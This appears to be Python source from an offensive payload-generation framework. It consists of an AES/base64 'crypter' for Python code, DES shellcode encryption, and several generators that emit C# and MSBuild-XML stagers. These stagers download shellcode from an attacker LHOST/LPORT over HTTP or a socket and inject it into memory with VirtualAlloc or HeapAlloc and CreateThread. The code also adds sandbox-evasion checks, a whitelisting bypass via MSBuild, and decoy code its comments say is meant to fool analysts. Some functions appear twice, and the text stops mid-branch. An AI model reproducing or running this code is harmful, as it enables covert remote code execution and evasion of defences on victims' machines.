def pyherion(code):
"""
Generates a crypted hyperion'esque version of python code using
base64 and AES with a random key, wrapped in an exec() dynamic launcher.
code = the python source code to encrypt
Returns the encrypted python code as a string.
"""
imports = list()
codebase = list()
# strip out all imports from the code so pyinstaller can properly
# launch the code by preimporting everything at compiletime
for line in code.split("\n"):
if not line.startswith("#"): # ignore commented imports...
if "import" in line:
imports.append(line)
else:
codebase.append(line)
# encrypt the input file (less the imports)
encrypted_code, key, iv = aes_encryption("\n".join(codebase),
encryption_pad='{')
encrypted_code = encrypted_code.decode('ascii')
# some random variable names
b64var = helpers.randomString()
aesvar = helpers.randomString()
# randomize our base64 and AES importing variable
imports.append("from base64 import b64decode as " + b64var)
imports.append("from Crypto.Cipher import AES as " + aesvar)
# shuffle up our imports
random.shuffle(imports)
# add in the AES imports and any imports found in the file
crypted = ";".join(imports) + "\n"
# the exec() launcher for our base64'ed encrypted string
to_be_encoded = "exec(" + aesvar + ".new(\"" + key + "\", " + aesvar + ".MODE_CBC, \"" + iv + "\").decrypt(" + b64var + "(\"" + encrypted_code + "\")).rstrip(b'{'))\n"
to_be_encoded = to_be_encoded.encode()
encoded_script = base64.b64encode(to_be_encoded).decode('ascii')
crypted += "exec(" + b64var + "(\"" + encoded_script + "\"))"
return crypted
def pyherion(code):
"""
Generates a crypted hyperion'esque version of python code using
base64 and AES with a random key, wrapped in an exec() dynamic launcher.
code = the python source code to encrypt
Returns the encrypted python code as a string.
"""
imports = list()
codebase = list()
# strip out all imports from the code so pyinstaller can properly
# launch the code by preimporting everything at compiletime
for line in code.split("\n"):
if not line.startswith("#"): # ignore commented imports...
if "import" in line:
imports.append(line)
else:
codebase.append(line)
# encrypt the input file (less the imports)
encrypted_code, key, iv = aes_encryption("\n".join(codebase), encryption_pad='{')
encrypted_code = encrypted_code.decode('ascii')
# some random variable names
b64var = helpers.randomString()
aesvar = helpers.randomString()
# randomize our base64 and AES importing variable
imports.append("from base64 import b64decode as " + b64var)
imports.append("from Crypto.Cipher import AES as " + aesvar)
# shuffle up our imports
random.shuffle(imports)
# add in the AES imports and any imports found in the file
crypted = ";".join(imports) + "\n"
# the exec() launcher for our base64'ed encrypted string
to_be_encoded = "exec(" + aesvar + ".new(\"" + key + "\", " + aesvar + ".MODE_CBC, \"" + iv + "\").decrypt(" + b64var + "(\"" + encrypted_code + "\")).rstrip(b'{'))\n"
to_be_encoded = to_be_encoded.encode()
encoded_script = base64.b64encode(to_be_encoded).decode('ascii')
crypted += "exec(" + b64var + "(\"" + encoded_script + "\"))"
return crypted
def des_encryption(incoming_shellcode):
# Generate a random key, create the cipher object
# pad the shellcode, and encrypt the padded shellcode
# return encrypted -> encoded shellcode and key
random_des_key = helpers.randomKey(8)
iv = helpers.randomString(8)
des_cipher_object = DES.new(random_des_key, DES.MODE_CBC, iv)
padded_shellcode = encryption_padding(incoming_shellcode)
encrypted_shellcode = des_cipher_object.encrypt(padded_shellcode)
encoded_ciphertext = base64.b64encode(encrypted_shellcode)
return encoded_ciphertext, random_des_key, iv
def des_encryption(incoming_shellcode):
# Generate a random key, create the cipher object
# pad the shellcode, and encrypt the padded shellcode
# return encrypted -> encoded shellcode and key
random_des_key = helpers.randomKey(8)
iv = helpers.randomString(8)
des_cipher_object = DES.new(random_des_key, DES.MODE_CBC, iv)
padded_shellcode = encryption_padding(incoming_shellcode)
encrypted_shellcode = des_cipher_object.encrypt(padded_shellcode)
encoded_ciphertext = base64.b64encode(encrypted_shellcode)
return encoded_ciphertext, random_des_key, iv
def generate(self):
# imports and namespace setup
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
payload_code += "namespace %s { class %s {\n" % (
helpers.randomString(), helpers.randomString())
# code for the randomString() function
randomStringName = helpers.randomString()
bufferName = helpers.randomString()
charsName = helpers.randomString()
t = list(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
payload_code += "static string %s(Random r, int s) {\n" % (
randomStringName)
payload_code += "char[] %s = new char[s];\n" % (bufferName)
payload_code += "string %s = \"%s\";\n" % (charsName, chars)
payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
bufferName, charsName, charsName)
payload_code += "return new string(%s);}\n" % (bufferName)
# code for the checksum8() function
checksum8Name = helpers.randomString()
payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = helpers.randomString()
baseStringName = helpers.randomString()
randCharsName = helpers.randomString()
urlName = helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
genHTTPChecksumName, baseStringName)
payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
baseStringName, randomStringName)
payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
randCharsName, randChars)
payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
randCharsName)
payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
randCharsName)
payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
checksum8Name, urlName, urlName)
# code for getData() function
getDataName = helpers.randomString()
strName = helpers.randomString()
webClientName = helpers.randomString()
sName = helpers.randomString()
payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
strName)
payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
webClientName)
payload_code += "byte[] %s = null;\n" % (sName)
payload_code += "try { %s = %s.DownloadData(%s);\n" % (
sName, webClientName, strName)
payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
payload_code += "catch (WebException) {}\n"
payload_code += "return %s;}\n" % (sName)
# code fo the inject() function to inject shellcode
injectName = helpers.randomString()
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
# code for Main() to launch everything
sName = helpers.randomString()
randomName = helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Create Payload code
payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(
RandToday)
payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format(
RandExpire, RandToday,
self.required_options["EXPIRE_PAYLOAD"][0])
payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(
RandExpire, RandToday)
# Add a tab for this check
curlyCount += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
self.required_options["HOSTNAME"][0].lower())
# Add a tab for this check
curlyCount += 1
if self.required_options["DOMAIN"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'
# Add a tab for this check
curlyCount += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
self.required_options["PROCESSORS"][0])
# Add a tab for this check
curlyCount += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = helpers.randomString()
rand_char_name = helpers.randomString()
payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
rand_user_name)
payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(
rand_char_name, rand_user_name)
payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(
rand_char_name, self.required_options["USERNAME"][0])
# Add a tab for this check
curlyCount += 1
payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
randomName)
payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (
sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
payload_code += "%s(%s);}\n" % (injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# MSBuild specific variables
targetName = bypass_helpers.randomString()
className = bypass_helpers.randomString()
# get 12 random variables for the API imports
r = [bypass_helpers.randomString() for x in range(12)]
y = [bypass_helpers.randomString() for x in range(17)]
# The header for MSBuild XML files
# TODO: Fix the awful formatting
msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}">
<{1} />
</Target>
<UsingTask
TaskName="{1}"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
""".format(targetName, className)
# imports and namespace setup
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
payload_code += "public class %s : Task, ITask {\n" % (className)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
# code for the randomString() function
randomStringName = bypass_helpers.randomString()
bufferName = bypass_helpers.randomString()
charsName = bypass_helpers.randomString()
t = list(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
# code for the randomString() method
payload_code += "static string %s(Random r, int s) {\n" % (
randomStringName)
payload_code += "char[] %s = new char[s];\n" % (bufferName)
payload_code += "string %s = \"%s\";\n" % (charsName, chars)
payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
bufferName, charsName, charsName)
payload_code += "return new string(%s);}\n" % (bufferName)
# code for the checksum8() function
checksum8Name = bypass_helpers.randomString()
payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = bypass_helpers.randomString()
baseStringName = bypass_helpers.randomString()
randCharsName = bypass_helpers.randomString()
urlName = bypass_helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
genHTTPChecksumName, baseStringName)
payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
baseStringName, randomStringName)
payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
randCharsName, randChars)
payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
randCharsName)
payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
randCharsName)
payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
checksum8Name, urlName, urlName)
# code for getData() function
getDataName = helpers.randomString()
strName = helpers.randomString()
webClientName = helpers.randomString()
sName = helpers.randomString()
payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
strName)
payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
webClientName)
payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
webClientName)
payload_code += "byte[] %s = null;\n" % (sName)
payload_code += "try { %s = %s.DownloadData(%s);\n" % (
sName, webClientName, strName)
payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
payload_code += "catch (WebException) {}\n"
payload_code += "return %s;}\n" % (sName)
# code fo the inject() function to inject shellcode
injectName = bypass_helpers.randomString()
sName = bypass_helpers.randomString()
funcAddrName = bypass_helpers.randomString()
hThreadName = bypass_helpers.randomString()
threadIdName = bypass_helpers.randomString()
pinfoName = bypass_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
# code for Main() to launch everything
sName = bypass_helpers.randomString()
randomName = bypass_helpers.randomString()
num_tabs_required = 0
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
num_tabs_required += 2
payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
randomName)
payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (
sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
payload_code += "%s(%s);\n" % (injectName, sName)
while (num_tabs_required != 0):
if num_tabs_required == 2:
# return true for the msbuild Execute() function
payload_code += "\nreturn true;"
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
else:
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
payload_code = msbuild_header + payload_code
self.payload_source_code = payload_code
return
def generate(self):
getDataName = helpers.randomString()
injectName = helpers.randomString()
targetName = bypass_helpers.randomString()
className = bypass_helpers.randomString()
# get 12 random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
# The header for MSBuild XML files
# TODO: Fix the awful formatting
msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}">
<{1} />
</Target>
<UsingTask
TaskName="{1}"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
""".format(targetName, className)
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
payload_code += "public class %s : Task, ITask {\n" % (className)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
hostName = helpers.randomString()
portName = helpers.randomString()
ipName = helpers.randomString()
sockName = helpers.randomString()
length_rawName = helpers.randomString()
lengthName = helpers.randomString()
sName = helpers.randomString()
total_bytesName = helpers.randomString()
handleName = helpers.randomString()
payload_code += "static byte[] %s(string %s, int %s) {\n" % (
getDataName, hostName, portName)
payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
ipName, hostName, portName)
payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
sockName)
payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
payload_code += " catch { return null;}\n"
payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName,
length_rawName)
payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (
lengthName, length_rawName)
payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName,
lengthName)
payload_code += " int %s = 0;\n" % (total_bytesName)
payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
total_bytesName, sockName, sName, total_bytesName, lengthName,
total_bytesName, lengthName, total_bytesName)
payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
handleName, sockName)
payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
handleName, sName, sName)
payload_code += " return %s;}\n" % (sName)
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
sName = helpers.randomString()
num_tabs_required = 0
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
num_tabs_required += 2
payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
sName, sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += " %s(%s);\n" % (injectName, sName)
while (num_tabs_required != 0):
if num_tabs_required == 2:
# return true for the msbuild Execute() function
payload_code += "\nreturn true;"
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
else:
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
payload_code = msbuild_header + payload_code
self.payload_source_code = payload_code
return
def generate(self):
# randomize all our variable names, yo'
classhellcodeName = bypass_helpers.randomString()
classhellcodeNameTwo = bypass_helpers.randomString()
namespace = bypass_helpers.randomString()
key = bypass_helpers.randomString()
injectName = bypass_helpers.randomString()
execName = bypass_helpers.randomString()
bytearrayName = bypass_helpers.randomString()
funcAddrName = bypass_helpers.randomString()
savedStateName = bypass_helpers.randomString()
shellcodeName = bypass_helpers.randomString()
rand_bool = bypass_helpers.randomString()
random_out = bypass_helpers.randomString()
getDataName = helpers.randomString()
hThreadName = bypass_helpers.randomString()
threadIdName = bypass_helpers.randomString()
pinfoName = bypass_helpers.randomString()
num_tabs_required = 0
# get random variables for the API imports
r = [bypass_helpers.randomString() for x in range(16)]
y = [bypass_helpers.randomString() for x in range(17)]
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;\n"
payload_code += "namespace {0}\n {{".format(namespace)
payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(
classhellcodeName)
# placeholder for legitimate C# program
# lets add a message box to throw offf sandbox heuristics and analysts :)
payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(
classhellcodeName)
payload_code += "\n\t\t[ComRegisterFunction]"
payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(
key)
payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(
classhellcodeNameTwo, execName)
payload_code += "\n[ComUnregisterFunction]"
payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(
key)
payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(
classhellcodeNameTwo, execName)
payload_code += "\n\tpublic class {0}\n\t{{".format(
classhellcodeNameTwo)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
